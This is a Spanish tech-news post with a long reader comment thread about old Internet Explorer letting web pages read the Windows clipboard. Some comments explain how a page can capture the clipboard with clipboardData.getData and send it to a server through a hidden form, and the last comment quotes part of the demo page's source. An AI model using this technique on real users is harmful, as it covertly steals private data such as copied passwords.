Banda Ancha EU

Información independiente
sobre fibra, móvil y ADSL

  • 📰 Artículos

A vueltas con el portapapeles

alejandrosantos

Leo asombrado en Kriptópolis que el portapapeles de un Windows puede ser visualizado desde la web con total facilidad. Tal y como lo explican allí, es muy sencillo comprobarlo:

  • Copia cualquier texto en el portapapeles de Windows.
  • Arranca tu IExplorer (da igual que sea la ultimísima versión, perfectamente actualizada).
  • Visita la página de demostración.
  • Voilà! Ahí tienes -negro sobre blanco- lo que antes copiaste.

Al parecer Microsoft no considera esto una vulnerabilidad, sino una funcionalidad de Explorer. Quien no esté conforme (y creo que hay muchos motivos para no estarlo) puede desactivar esta conducta mediante Opciones de Internet -> Seguridad -> Nivel Personalizado -> Automatización -> Permitir Operaciones de pegado por medio de una secuencia de comandos -> Desactivar.

En Firefox, Opera y Safari, este comportamiento no ocurre. Para Microsoft se trata sin más de permitir operaciones de pegado por medio de una secuencia de comandos. Teniendo en cuenta que es una opción configurable, ¿es una chapuza de los de Redmond?, ¿es un error copiar información sensible en el portapapeles?, ¿Microsoft realmente no se preocupa de la privacidad?.

Lo que si es cierto es que la "facilidad" en el uso de Windows tiene poco que ver con desactivar esta "funcionalidad".

BocaDePez
BocaDePez

La desactivas y no hay mayor problema.

Salu2.

🗨️ 68
BocaDePez
BocaDePez

SI hay problema. El problema es precisamente que la opción activada por defecto es la insegura y no al contrario. No solo hay que tener en cuenta a los usuarios experimentados o con cierta facilidad de uso, sino a todos aquellos usuarios que utilizan el ordenador como herramienta dedicada a algo concreto pero que no saben de informática ni necesitan saberlo. Preguntale a un médico o a un administrativo qué son las cookies y quizá te diga que son galletas con chocolate, y si les nombras el portapapeles probablemente la mayoría ni siquiera sepan que existe a pesar de usarlo continuamente con el copiar y pegar.
En fin, otra vez se demuestra que windows es un producto defectuoso y gates un estafador, además de otras cosas..

🗨️ 67
Akuma
🗨️ 64
BocaDePez
BocaDePez
🗨️ 17
Akuma
🗨️ 16
Akuma
🗨️ 15
Akuma
🗨️ 14
Akuma
🗨️ 13
Akuma
🗨️ 12
Akuma
🗨️ 11
Akuma
🗨️ 10
Akuma
🗨️ 9
Akuma
🗨️ 8
Akuma
🗨️ 7
Akuma
🗨️ 6
Akuma
🗨️ 5
Akuma
🗨️ 4
Akuma
🗨️ 3
Akuma
🗨️ 2
Akuma
🗨️ 1
BocaDePez
BocaDePez
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
🗨️ 29
Akuma
🗨️ 24
Akuma
🗨️ 23
Akuma
🗨️ 22
Akuma
🗨️ 21
Akuma
🗨️ 20
Akuma
🗨️ 19
Akuma
🗨️ 18
Akuma
🗨️ 17
Akuma
🗨️ 16
Akuma
🗨️ 15
Akuma
🗨️ 14
Akuma
🗨️ 13
Akuma
🗨️ 12
Akuma
🗨️ 11
Akuma
🗨️ 10
Akuma
🗨️ 9
Akuma
🗨️ 8
Akuma
🗨️ 7
Akuma
🗨️ 6
Akuma
🗨️ 5
Akuma
🗨️ 4
Akuma
🗨️ 3
Akuma
🗨️ 2
Akuma
🗨️ 1
Akuma
K-Beast
🗨️ 3
Akuma
🗨️ 2
K-Beast
🗨️ 1
Akuma
BocaDePez
BocaDePez
🗨️ 1
BocaDePez
BocaDePez
BocaDePez
BocaDePez

Como windows es un sistemas muy confiable, lo que tiene que funcionar no funciona y viceversa.

BocaDePez
BocaDePez

Sorry, I got nothing on you.

I presume that is because you don't use IE. Good for you!

Firefow ftw!!!

Recalcitrante

Voy y le quito la cartera a un fulano. Si se mosquea conmigo, le digo: "no tiene usted motivo para enfadarse, basta con que lleve puesto un cartel que diga que no quiere que le quiten la cartera, y en ese caso, yo no se la quitaré"

Axelko

Windows XP SP2 + Internet Explorer 6.0.2900.2180 + Función activada = "Sorry, I got nothing on you."

Windows 2000 Server + Internet Explorer 6.0.2800.1106 + Función activada = "Sorry, I got nothing on you."

¿Seguro que no es un fake?

P.D.: no obstante mi navegador habitual es Firefox

🗨️ 4
alejandrosantos

No es un fake. Es posible que lo tengas desactivado.

🗨️ 1
heffeque

Deben de tener javascript desactivado :-)

Kachinvo

Acabo de probar y son unas risas, si funciona, :p

Pitufito

Lo he probado y si que funciona.
COn windows 2000 actualizado y el IE idem

Krigan

Con Konqueror tampoco pasa.

Sí, es una chapuza. MS no se preocupa de la seguridad.

Pero claro, es MS. ¿Qué esperabas?. Mientras siga habiendo gente que crea que es igual de seguro usar MS que cualquier otra cosa seguirán pasando estas cosas. O mejor dicho, le seguirán pasando a otros.

A mi plin, yo duermo en pikolín...

🗨️ 8
BocaDePez
BocaDePez

Ya te darás cuenta de que el software tiene errores y funcionalidades que no te gustan, independientemente de quien lo desarrolle y de que sea libre o código cerrado.

Pero será cuando crezcas un par de años mentales...

🗨️ 7
Krigan

Cuando hayas manejado Windows 3.0, 3.1, 95, 98, 98 SE, Me, NT 4.0, 2000, y XP vuelves y me cuentas.

Hasta entonces mantengo lo dicho.

En cuanto a edad mental, no estoy muy seguro de cual es la tuya...

🗨️ 6
BocaDePez
BocaDePez

Se te olvida el Ábaco y el MSDos

🗨️ 5
Krigan

El ábaco no lo he manejado, pero el MS-DOS sí. Varias versiones. Tampoco era muy seguro, pero ya sabemos que a algunos (no me refiero a ti, sino al otro) les sienta mal que se diga que el soft de MS es inseguro.

🗨️ 1
BocaDePez
BocaDePez
BocaDePez
BocaDePez

Nombrando win 3.0 y 3.1 se da por implícito que se ha manejado msdos, ya que no funcionaban si no era sobre este..
De todas formas tampoco hace falta irse a tiempos tan ancestrales. A pesar de que efectivamente todo el sw tiene errores, la concentración de errores por programa en windows vs la de otros sistemas (y no me refiero solo a linux, sino a cualquier otro SO) es brutal. Y aunque el programa en cuestión no tenga errores, el principal error es que funciona sobre un SO mal diseñado que facilita la inseguridad y la inestabilidad. Pero claro, el 99% de la gente aprende con windows y piensa que no hay nada mejor. Pues allá ellos. Que se gasten la pa$ta una vez tras otra en productos defectuosos. Yo seguiré con mi segura, estable y gratuita distribución GNU/linux donde la mayoría de los programas funcionan mejor, incluidos los de windows..

🗨️ 2
Akuma
BocaDePez
BocaDePez
BocaDePez
BocaDePez

La mejor forma de solucionar este bug es ir a mozilla.org/en-US y descargar el firefox, ahora solo te queda solucionar el otro bug, mas gordo si cabe,, entonces te vas a ubuntu.com o (link roto)

BocaDePez
BocaDePez

esto es una chorrada!! k fallo de seguridad!! es solo k ejecutas una sentencia php en tu ordenador para ver lo k hay en el portapapeles... lo mismo lo puedes hacer con C, VB o cualker lenguaje de programacion el hecho de k aparezca en el IE no kiere decir k TODO el mundo k esta conectado a internet pueda ver tu portapapeles... k chorrada!! por eso si copias algo al portapapeles puedes copiarlo en cualkier aplicacion... para eso es el portapapeles... tonterias...

🗨️ 57
Axelko

Estooo... tú confundes código de cliente con código de servidor. PHP es código de servidor, lo que significa que es el servidor quien recibe los datos, procesa la petición y devuelve el html formateado al cliente.

Salu2.

🗨️ 56
Akuma

El tiene razon, mira el kodigo de la pagina, es una tremenda chorrada. Lo uniko ke hace es ejekutar una sentencia ke kopia el kontenido del portapapeles en una variable char y la envia kon submit al servidor. Esto es una parida, es simplemente el uso de un komando en javascript, en konkreto este var content = clipboardData.getData("Text"); ke si se puede ejekutar es porke ya de por si existia, y hace mucho. Es simplemente una funcionalidad mas de esas ke Microsoft añade a su IE y ke Firefox y otros navegadores no implementan, al igual ke otros komandos no estandares por los ke se ven paginas en IE y en Firefox no. No es un bug, es solo una implementacion no estandard mas ke hay en IE.

La verdad es ke me parece lamentable ke ahora BA se dedike a "ilustrarnos" kon los komandos no estandard de IE komo si fueran bugs.

Asi de sencillo.

Salu2.Akuma.

🗨️ 16
Krigan

Ya, pero el caso es que IE entrega los datos de tu portapaleles a quien los pida, y otros navegadores no.

🗨️ 10
BocaDePez
BocaDePez
🗨️ 1
Akuma
BocaDePez
BocaDePez
🗨️ 1
Akuma
K-Beast
🗨️ 4
Akuma
🗨️ 3
K-Beast
BocaDePez
BocaDePez
🗨️ 1
morphoide
Axelko

Esta es la salida que obtengo de la web de la noticia:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<TITLE>Seriesys</TITLE>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-15">
<LINK REL=STYLESHEET TYPE="text/css" HREF="layout.css">
</HEAD>
<BODY>

<h2>Sorry, I got nothing on you.</h2>
<p>I presume that is because you don't use IE. Good for you!</p>
</BODY>
</HTML>

Aquí no hay ni una sola referencia a javascript. Salu2.

🗨️ 3
Akuma

Activa la opcion de la ke se habla y lo veras. Tu lo tienes desactivado.

Salu2.Akuma.

🗨️ 2
Axelko
🗨️ 1
Akuma
Worked

Pero si se hace un estandar (en la mayoria de los casos nada más eh!) es para seguirlo, y no para agregar funciones, cambiar el nombre de las funciones, o el retorno de las funciones como hace MS (no solo en el navegador, sino tb en su software, pero de ese tema no se trata el hilo).

MS, pertenece al W3C pero fela literalmente de lo que el mismo aprueba en los consorcios de este. Su navegador no es que tenga fallos... es que directamente es una ventana abierta para aquel que sepa ordenes de ese tipo. Puede que la de enviar el código del clipboard (que ya por defecto, es bastante fuerte) parezca una chorrada... pero sabias que con un javascript similar puedo ver todas las tareas de tu sistema? (anteriormente systemTask.getInfo()...), la tenencia de esos javascripts y los controles ActiveX (que se usan actualmente para validar tu copia de windows en la página de update, entre algún que otro javascript básico) compromenten bastante la privacidad de un usuario, da igual que sea un profesor, un gerente de empresas, o los salidos de los canales de sexo del chat... MS continuamente compromete la seguridad del usuario, sino que me expliquen porque nada más instalar tu flamante XP (da igual sp1, sp2, o XP a pelo) tienes el Alexa metido en el sistema.

Yo soy diseñador web (o lo intento vamos) y es que me da por culo simple y llanamente que alguien me diga que en el IE no se ven bien las webs, cuando MS empieze a adaptarse y a funcionar bajo los estandares que el mismo firma, el mundo podrá ser un lugar más bonito.

PD: Sin animo de acritud eh!

Akuma

Y por cierto, este komando es mas viejo ke la tos, kon decir ke se implementó en el tiempo en ke aparecio IE 5 lo digo todo....

Una pena ke aparezkan aki noticias de hace 7 años.

Salu2.Akuma.

🗨️ 38
Krigan

O sea, que durante 7 años los usuarios de IE han tenido su portapapeles abierto de patas para que cualquiera lo mire };-)

🗨️ 6
Akuma

No, todo dependia de komo konsiderases tu seguridad en Internet. Seguro ke a muchos les daba igual kargar ActiveX sin firmar, pero a otros no, lo mismo ke esta opcion. Y tambien los habra a los ke esta opcion le haya sido util, komo por ejemplo a la hora de usar el Getright y aprovechar lo ke se kopia en el portapapeles directamente de una web por ejemplo.

Lo ke no se es porke aparece esto aki komo noticia, ke no se haya enterado algun newbie de kriptopolis lo entiendo, pero ke rwx lo ponga en BA komo novedad no me parece mas ke una falta de ideas, falta de noticias y falta de rigor informativo por no kontrastarlas.

Salu2.Akuma.

🗨️ 5
Krigan
🗨️ 4
Akuma
🗨️ 3
K-Beast
🗨️ 1
Akuma
BocaDePez
BocaDePez
BocaDePez
BocaDePez

Por supuesto, Akuma, seguro que tu lo sabías. Tu lo sabes todo de Microsoft porque tu hobby debe ser leerte todo lo que publican en el MSDN.

Y como es una chorrada tan nimia, no te molestarás en pensar qué es lo que estás copiando cada vez que pulsas Ctrl+C (como por ejemplo Contraseñas).

Pero la mayoría de la gente no lo sabe y dudo mucho que vayan a leerse el MSDN, por lo tanto pueden estar por comodidad copiando sus contraseñas al portapapeles mientras navegan.

Yo por si acaso me voy a poner Firefox que no tengo ganas de volver a enterarme de cosas como esta ni aunque estas lleven 7 años publicadas.

Y cuidadin con lo copias, yo tengo muchas cosas en la cabeza como para preocuparme de tales menesteres.

Hasta el proximo MS BUG... digo hasta la proxima ocasión.

🗨️ 29
Akuma

Pues yo si lo sabia, porke precisamente hace 7 años aparecio tambien komo noticia y me enteré. Kiza tu ke hayas llegado hace 2 dias a la informatika estes asi y lo veas komo un noticion de ultima hora(pfffffffff), pero los ke ya tenemos unos años en internet esto ni es noticia ni es nada.

Pongamos a repasar todos los bugs de hace 7 años(tanto de Linux komo de Windows) y a ponerlos komo noticia. Vamos hombre.

🗨️ 28
K-Beast
🗨️ 27
Akuma
🗨️ 26
BocaDePez
BocaDePez
🗨️ 15
Akuma
🗨️ 14
K-Beast
🗨️ 13
Akuma
🗨️ 12
BocaDePez
BocaDePez
🗨️ 5
BocaDePez
BocaDePez
🗨️ 4
BocaDePez
BocaDePez
🗨️ 3
Akuma
🗨️ 2
BocaDePez
BocaDePez
🗨️ 1
Akuma
Akuma
🗨️ 4
Krigan
🗨️ 3
Akuma
🗨️ 2
Krigan
🗨️ 1
Akuma
jjgonche
🗨️ 9
Akuma
🗨️ 8
Akuma
Akuma
Akuma
Akuma
Akuma
🗨️ 3
Akuma
🗨️ 2
Akuma
🗨️ 1
Akuma
BocaDePez
BocaDePez

Ya te digo que si es viejo, no se si 7 años, pero mas de dos seguro que sí. Lo que pasa es que la noticia está un poco mal enfocada, lo grave es que esto *siga* siendo una vulnerabilidad desde hace la tira de tiempo y los de Micro$oft les resbale. Porque, vale, no es grave, pero puede ser delicado en según que casos.

Lo que más me alucina es que lo publiquen en Kriptopolis.

BocaDePez
BocaDePez

Mas que un bug es una opcio de configuracion por defecto que no se deberia dar, como el user anonimo de ciertos servdores de ftp que no son mas que coladeros de todo tipo de archivos.

Pero es un poco la mentalidad anglosajona, esos tios en la vida real se dejan la puerta de casa abierta sin llave, luego se quejan de que les roban, si ni tan siquiera echan el pestillo. Supongo que algo de la mentalidad y la simple vida anglosajona ha debido salpicar a la informatica tambien.

CATShannon

Probado con Maxthon, que según creo usa el motor de IE y no funciona.

Por cierto, y ya que estoy aquí y si se me permite, me gustaría saber porque la gente alaba tanto a Firefox. No acabo de entenderlo, lo he probado y me parece lento, o muy lento. No tiene casi opciones de configuración, y lo de las pestañas parece de broma. Vamos, que no me convence para dejar mi Maxthon. Estoy a favor del software libre y ya me he pasado a OpenOffice, pero lo de Firefox no lo entiendo. O sea, entiendo que la gente no quiera usar IE, de acuerdo, pero ¿¿¿Firefox???

Con Maxthon tengo mil pestañas que se abren facilmente. Pincho sobre un link, arrastro y ya está en una pestaña nueva. Por cierto, las pestañas están abajo, opción que no encontré en Firefox. Si quiero buscar un texto en google (o el buscador que yo quiera), solo tengo que seleccionar el texto que veo en una web y arrastrarlo para que directamente lo busque en google. Y así con un monton de chorradas más que hacen que prefiera mil veces Maxthon a Firefox... Eso si, IE ni de palo...

Un saludo....

🗨️ 6
Akuma
🗨️ 5
BocaDePez
BocaDePez
K-Beast
🗨️ 3
Akuma
🗨️ 2
K-Beast
🗨️ 1
Akuma
ZOTON

Estoy convencido de que si el firefox fuera el navegador más extendido o linux el Sistema Operativo más usado, también les aparecerían con mayor frecuencia bugs de seguridad, y parches y services packs, porque independientemente del grado de vulnerabilidad de una aplicación o sistema, además se necesita de gente "interesada" en meter las narices en tu PC.
SAludos.

🗨️ 45
Krigan

Hay cosas que no son simples bugs, que eso lo tienen todos los programas, sino pura dejadez en materia de seguridad.

3 ejemplos:

- Este caso.

- Que las cuentas de usuario en XP tengan privilegios de Administrador por defecto.

- Que el Outlook y el Outlook Express, en la configuración por defecto, le den a todo aquel que lo pida todas las direcciones de correo de tu libreta de direcciones, y le permitan, a todo aquel que lo desee, enviar un correo desde tu ordenador con el texto que quiera el atacante. Esto tampoco se considera un bug por parte de MS. Esta "prestación" es la base del funcionamiento de los virus de correo electrónico.

MS siempre ha sido así. Siempre han pasado de la seguridad. Sencillamente, no les importa si tu ordenador es inseguro.

🗨️ 43
Akuma

No se tu, pero yo antes de konducir me abrocho el cinturon de seguridad muchacho. Y esto es igual, antes de navegar por Internet o de usar un ordenador para algo ke pueda tener un riesgo para el ekipo, lo ke hago es KONFIGURARLO.

A alguien ke no tenga Internet le va a dar lo mismo el ke exista esta opcion, o ke la kuenta ke krea por defecto XP sea de Administrador, o el Outlook. Te rekuerdo ke Windows no solo se usa para navegar por internet, P2P, etc. sino ke hay muchas empresas y usuarios(mas de los ke hay usando internet) ke no tienen konexion a la red y ke les es indiferente para la seguridad estas opciones.

Salu2.Akuma.

🗨️ 42
K-Beast

Buen ejemplo, el cinturon (que es una cosa palpable a 10 centimetros de tu cara, con lo cual se ve enseguida), con la concienciación a base de campañas, con lo que implica si no te pones el cinturon, riesgo de lesiones y riesgo de multas lo comparamos con una opcion, que nadie conoce y medio escondida en las opciones del navegador.

Si para no ceder (posiblemente) tus datos confidenciales hay que saber todas las opciones del explorer me parece que es un programa ruin a más no poder.

La misma facilidad tiene encontrar esa opcion que ponerte el cinturon que es un click, en fin,, lo que hay que leer otra vez..

🗨️ 30
Akuma

Eske akaso hay muy poka informacion de para ke sirve kada opcion del navegador verdad? pues resulta ke hay toneladas y toneladas de para ke sirven las opciones de konfiguracion del navegador mas usado, el problema es ke tu no las lees, y eso es tu problema, komo el no ver los anuncios del cinturon de seguridad o hacer kaso omiso de las advertencias de seguridad. Inkluso aunke se advierta, ya ves tu la kantidad inmensa de gente ke se las pasa por el forro diciendo "eso no me va a pasar a mi". Y en esto de la informatika es igual "va, hackers ke miren mi portapapeles, eso no me va a pasar a mi".

Salu2.Akuma.

🗨️ 29
K-Beast
🗨️ 28
Akuma
🗨️ 27
BocaDePez
BocaDePez
🗨️ 6
Akuma
🗨️ 5
BocaDePez
BocaDePez
🗨️ 4
Akuma
🗨️ 3
BocaDePez
BocaDePez
🗨️ 2
Akuma
🗨️ 1
BocaDePez
BocaDePez
Akuma
🗨️ 18
Akuma
🗨️ 16
Akuma
Akuma
🗨️ 3
BocaDePez
BocaDePez
🗨️ 2
Krigan
🗨️ 1
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
🗨️ 6
Akuma
🗨️ 5
Akuma
🗨️ 4
Akuma
🗨️ 3
Akuma
🗨️ 2
Akuma
🗨️ 1
Akuma
Krigan

No sé que tienen que ver churras con merinas. Si entrega datos a todo aquel que los pide en la configuración por defecto es inseguro.

Evidentemente, si no conectas a Internet ni a ninguna otra red el IE es tan seguro como cualquier otro navegador. Yo a eso le llamo inventar la pólvora mojada.

🗨️ 10
Akuma

Tambien es inseguro tener los puertos del sistema operativo abiertos y tanto Linux komo Windows tienen algunos puertos de servicios abiertos SIEMPRE a no ser ke uses un firewall para paliarlo o kites el servicio. Y esto tampoko es un bug, pero si es inseguro.

En este kaso es lo mismo, ¿ke te parece inseguro? lo desactivas y punto, ke te da lo mismo? lo dejas activado y ya esta. ¿Kual es el problema?

Salu2.Akuma.

🗨️ 9
Krigan
🗨️ 8
Akuma
🗨️ 7
Krigan
🗨️ 6
Akuma
🗨️ 5
Krigan
🗨️ 4
Akuma
🗨️ 3
Krigan
🗨️ 2
BocaDePez
BocaDePez
🗨️ 1
Krigan
Axelko

De hecho para Firefox han aparecido vulnerabilidades muy graves. La diferencia es que normalmente se reparan en muy pocos días, y si es un fallo grave se publica una versión corregida en menos de 24h. Esto con IE es, al menos hasta ahora, inpensable. Es un navegador que lleva acumulando errores graves sin solucionar desde hace varios meses. No obstante, y esto es de cajón, todo software tiene bugs y el número de ellos descubiertos depende de forma directa del número de usuarios del mismo.

BocaDePez
BocaDePez

No hay nada que mas me joda que tener que darle la razon a Akuma.

En la proxima noticia de Kriptopolis veremos que hay un bug en C que permite que al aparecer un scanf("%s",&string); el usuario almacene una cadena de texto en una variable .... ¬¬

No creo que encontrar una funcion a drede para capturar el contenido del portapapeles se le pueda llamar bug, al igual que si hubiese una para formatear el ordenador, es una funcion que se hizo para tal tarea y que esta documentada, por lo tanto es una caracterisica mas aunque pudiese ser peligrosa.

A quien no le guste que la deshabilite, asi de sencillo :P

🗨️ 14
K-Beast

Bien, pero hay que saberlo para poder deshabilitarlo. Ahora ponen la noticia y se critica porque tiene 7 años, y ni dios sabia que eso exisitia.

Si esta opcion apareciera deshabilitada por defecto, no podriamos decir nada al respecto.

🗨️ 9
Akuma

Y porke yo lo sabia? y komo yo mucha mas gente?

Por ultimo REKORDARTE POR 3 o 4 VEZ ke en SP2 o en SP1 ya viene desactivado.

Salu2.Akuma.

🗨️ 7
K-Beast

Bueno pues por 3era vez te recuerdo que tengo Home + Sp2 y viene activado por defecto.

No te engaño, no he cambiado nada, mira la imagen.

(link roto)

moloc

Tengo XP Pro + SP2 y está activado.

Akuma

Pues ke raro porke a mi si me aparece desactivada por defecto.

Salu2.Akuma.

Shacklebolt

Porque tu eres muy listo.

Yo también la tengo activada por defecto con el pro.

🗨️ 3
BocaDePez
BocaDePez

pues debe ser eso porque yo tambien lo tengo activado por defecto en SP2 pro

Akuma

Pues a mi no me viene activada por defecto "LISTO"

🗨️ 1
almarma
BocaDePez
BocaDePez

El problema es de los que os poneis al "volante" de algo sin tener ni puta idea de como funciona. Traladalo a un teclado y un raton muchacho.

alejandrosantos

Las noticias están para opinar lo que uno quiera, incluido que sea una tontería. Pero nos hemos cuidado de poner que sea un fallo. Mira el título por ejemplo. Se da la opinión de Windows y además, se avisa que es configurable. En cuanto a la palabra "bug", no aparece en todo el texto.

🗨️ 3
Akuma

El problema es ke esto no es noticia. Algo NUEVO es lo ke verdaderamente es noticia y desde luego no algo de hace 7 años.

Salu2.Akuma.

🗨️ 2
BocaDePez
BocaDePez

Escribias con la k hace 7 años?

Hace 7 años andábamos con el Explorer 4.0, por lo que no creo que conocieras "implícitamente" que el explorer 6 (que tiene ¿4? años exagerando)...

🗨️ 1
Akuma

Hace 7 años aparecio IE 5(no el 4), version para la kual tambien vale esta funcionalidad de javascript.

Salu2.Akuma.

BocaDePez
BocaDePez

Yo en el codigo solo veo Javascript por lo que toda la informacion queda en el cliente. Es como una pagina web que hace ya años te sacaba el contenido de C. La gente se quedaba acojo.. viendo la pantalla pero en realidad todo se estaba haciendo localmente sin enviar informacion a ninguna parte. Vamos creo yo.

🗨️ 1
Krigan

El problema está en que también se envía esa información al servidor.

Mira otra vez el código Javascript. Básicamente consiste en que primero almacena el contenido del portapaleles en una variable Javascript (que ahí es donde está el agujero de seguridad), y después lo envía al servidor con un submit() de un formulario invisible.

Es un principio básico de seguridad. Cualquier info accesible para Javascript (o VBScript) está comprometida, porque siempre es posible enviarla al servidor con un submit.

Y se puede refinar poniendo un bucle para que envíe continuamente (cada vez que cambie) la información del portapapeles al servidor mientras mantengas abierta la página maliciosa. Vamos, que te pueden espiar a base de bien sin más que inducirte a mantener abierta su página (ofreciendo en ella algo que sea interesante, por ejemplo).

Buixi

Si con firefox sigues el enlace, cortas la url y la pegas en iexplorer, no va. Está claro que lo mejor para evitar las "features" de explorer es firefox xDDDDDD

BocaDePez
BocaDePez

Aunque esto lleve desde que salió el IE 5, yo no tenia ni idea y m parece muy buena idea decirlo, porque tal y como se ha puesto en los comentarios muchos de nosotros no lo sabiamos.

Por otro lado, me parece una funcionalidad que tiene más inconvenientes que convenientes. Tambien es cierto que no es una vulnerabilidad ya que puedes desactivarlo, pero no me parece la mitad de normal que si me "despisto" y tengo ciertos datos que no quiero que salgan a ser públicos en el portapapeles, que vaya a una página y pueda leerlos.

Por mucho menos se les -- ¿pidió o exigió? no lo recuerdo -- que cambiasen la configuración por defecto de las cookies.

Solo de pensar el tiempo que usé el IE y pensar que en algun momento tuve en el portapapeles datos personales que eran importantes para mi y que alguien los haya podido pillar, me entra un cabreo que pa que...

Además, la opcion que desactiva la opción, el texto que lo explica no es definitoria ya que informa sobre poder pegar mediante la secuencia de comandos, no dice nada de poder leer el contenido del mismo, que yo creo que no es lo mismo...

BocaDePez
BocaDePez

Que bug ni que leches...

Si queremos que una aplicacion JAVASCRIPT pegue el contenido de un texto del portapapeles a dicha aplicacion puslando un boton, no se podira hacer si no fuera por este comando.

Por ejemplo esos scripts que pegan el contenido del portapapeles detectando si viene de Word, si es plano, etc.

Logicamente, malitencionadamente puede enviarse la informacion con un form, pero para ello IE saca la ventana de "LA INFORMACION QUE SE ENVIARA BLA BLA BLA, ACEPAR?" solo que todo el mundo la primera vez que la ve le da a "NO RECORDAD MAS"

🗨️ 120
K-Beast

Entonces con Firefox no funciona ese javascript?

🗨️ 71
Akuma
🗨️ 67
BocaDePez
BocaDePez
🗨️ 1
Akuma
BocaDePez
BocaDePez
🗨️ 24
Akuma
🗨️ 23
BocaDePez
BocaDePez
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
🗨️ 15
Akuma
🗨️ 14
Akuma
🗨️ 13
Akuma
🗨️ 12
Akuma
🗨️ 11
Akuma
🗨️ 10
Akuma
🗨️ 9
Akuma
🗨️ 8
Akuma
🗨️ 7
Akuma
🗨️ 6
Akuma
🗨️ 5
Akuma
🗨️ 4
Akuma
🗨️ 3
Akuma
🗨️ 2
Akuma
🗨️ 1
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
🗨️ 21
Akuma
🗨️ 20
Akuma
🗨️ 19
Akuma
🗨️ 18
Akuma
🗨️ 17
Akuma
🗨️ 16
Akuma
🗨️ 15
Akuma
🗨️ 14
Akuma
🗨️ 13
Akuma
🗨️ 12
Akuma
🗨️ 11
Akuma
🗨️ 10
Akuma
🗨️ 9
Akuma
🗨️ 8
Akuma
🗨️ 7
Akuma
🗨️ 6
Akuma
🗨️ 5
Akuma
🗨️ 4
Akuma
🗨️ 3
Akuma
🗨️ 2
Akuma
🗨️ 1
Akuma
Akuma
🗨️ 2
Akuma
Krigan

Precisamente ahí es donde está el fallo de seguridad. Una aplicación Javascript contenida en una página web de Internet jamás debería tener acceso a datos personales, porque va a poder hacer con ellos lo que quiera.

Lo que dices de la ventanita de los formularios, no viene a cuento, por estos motivos:

- Cuando la gente le da a "No mostrar más" se da por entendido que se trata de datos que uno mismo ha metido en un formulario, no datos que un programa malicioso ya ha obtenido aprovechando un fallo de seguridad del navegador.

- Habría que ver si esa ventanita verdaderamente aparece en el caso de un formulario invisible. ¿Tú la has visto?. No ve visto que ningún usuario diga que aparece. ¿Lo has comprobado personalmente?.

- La página web puede incluir un formulario aparentemente legítimo para que esa ventanita no despierte sospechas (si es que aparece). Ese formulario "legítimo" puede consistir en un simple botón contenido en la página web que diga "Pulse para seguir" o cualquier otra cosa que se te ocurra. El fallo de seguridad se ha producido antes del envío, al conseguir los datos del portapapeles. Resolver el pequeño problema de enviarlos sin despertar sospechas es trivial.

🗨️ 47
Akuma

"Una aplicación Javascript contenida en una página web de Internet jamás debería tener acceso a datos personales, porque va a poder hacer con ellos lo que quiera."

Para eso esta el desactivarlo Krigan.

Antes de korrer aprende a andar, el problema es ke mucha gente ke no tiene ni idea de Windows kiere aprenderlo todo rapido, ya y en poko tiempo, algo imposible.

Salu2.Akuma.

🗨️ 46
Krigan

Pues mira, la mayoría de la gente, antes de empollarse la base de datos de MSDN para analizar las implicaciones de seguridad de todas las funciones "peculiares" de MS, posiblemente encuentren más sencillo instalar y usar el Firefox.

🗨️ 6
Akuma

Yo no digo ke te leas todo MSDN, pero tan dificil no sera leerse el para ke sirven kada opcion de seguridad de IE verdad? vamos ke no hay 50 Krigan, no llegan ni a las 20.

Salu2.Akuma.

🗨️ 5
Krigan
🗨️ 4
BocaDePez
BocaDePez
🗨️ 1
Krigan
Akuma
🗨️ 1
almarma
BocaDePez
BocaDePez

Te las das de listo... Seguro que te la han metido doblada más veces que a alguno de los supuestos "pardillos" que somos el resto de los mortales.

🗨️ 38
Akuma

Pues mira por donde te ekivokas. Por no entrarme no me entro ni sikiera el Blaster sin el firewall. Kosas de saber lo ke se hace.

🗨️ 37
BocaDePez
BocaDePez
🗨️ 36
Akuma
🗨️ 35
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
Akuma
🗨️ 24
Akuma
🗨️ 23
Akuma
🗨️ 22
Akuma
🗨️ 21
Akuma
🗨️ 20
Akuma
🗨️ 19
Akuma
🗨️ 18
Akuma
🗨️ 17
Akuma
🗨️ 16
Akuma
🗨️ 15
Akuma
🗨️ 14
Akuma
🗨️ 13
Akuma
🗨️ 12
Akuma
🗨️ 11
Akuma
🗨️ 10
Akuma
🗨️ 9
Akuma
🗨️ 8
Akuma
🗨️ 7
Akuma
🗨️ 6
Akuma
🗨️ 5
Akuma
🗨️ 4
Akuma
🗨️ 3
Akuma
🗨️ 2
Akuma
🗨️ 1
Akuma
SICYD

Esto es muy viejo, y no tiene que ver con el Bloc de notas, sino con el Portapapeles, que era posible leerlo desde script.

Basta con descartivar el acceso del páginas Web al Portapapeles en la configuración del Internet Explorer, o estar al día en cuanto a actualizaciones de seguridad.

Saludos.

tentacle

No le acabo de ver el problema. Efectivamente puedo ver el contenido del portapapeles, pero esto no sale de mi PC a no ser que haya otra vulnerabilidad que lo permita. Luego el problema seria esta última, pero no el que yo pueda ver el contenido de mi propio portapapeles.

Si me equivoco, corregidme, por favor.

Saludos

🗨️ 2
manowar

ya, es como si pones c:\ o /, ves el directorio de tu pc, pero solo lo ves tu.

Akuma

En el ejemplo no aparece porke no han kerido, pero el problema REAL es ke una vez pasado el kontenido del portapapeles a una variable esta se puede enviar kon el komando submit a una direccion de korreo, o de vuelta a la pagina web, etc. por lo ke la informacion SI podria salir de tu PC si se kisiera.

Salu2.Akuma.

BocaDePez
BocaDePez

pues a mi me sale esto

Here"s what you were doing before going here:

oeh.network-electronics.com/%7Eolegil/clipboard.html
Here"s how I did it:

<html>
<head>
<title>GNAA Last Measure v4.1 by Rucas with Armorfist"s PopupByPasser Mod.</title>
</head>

<body>

<form name="clip" method="post" action="test.php" style="display:none">
<input type="text" name="content">
<input type="submit">
</form>

<script language="javascript">
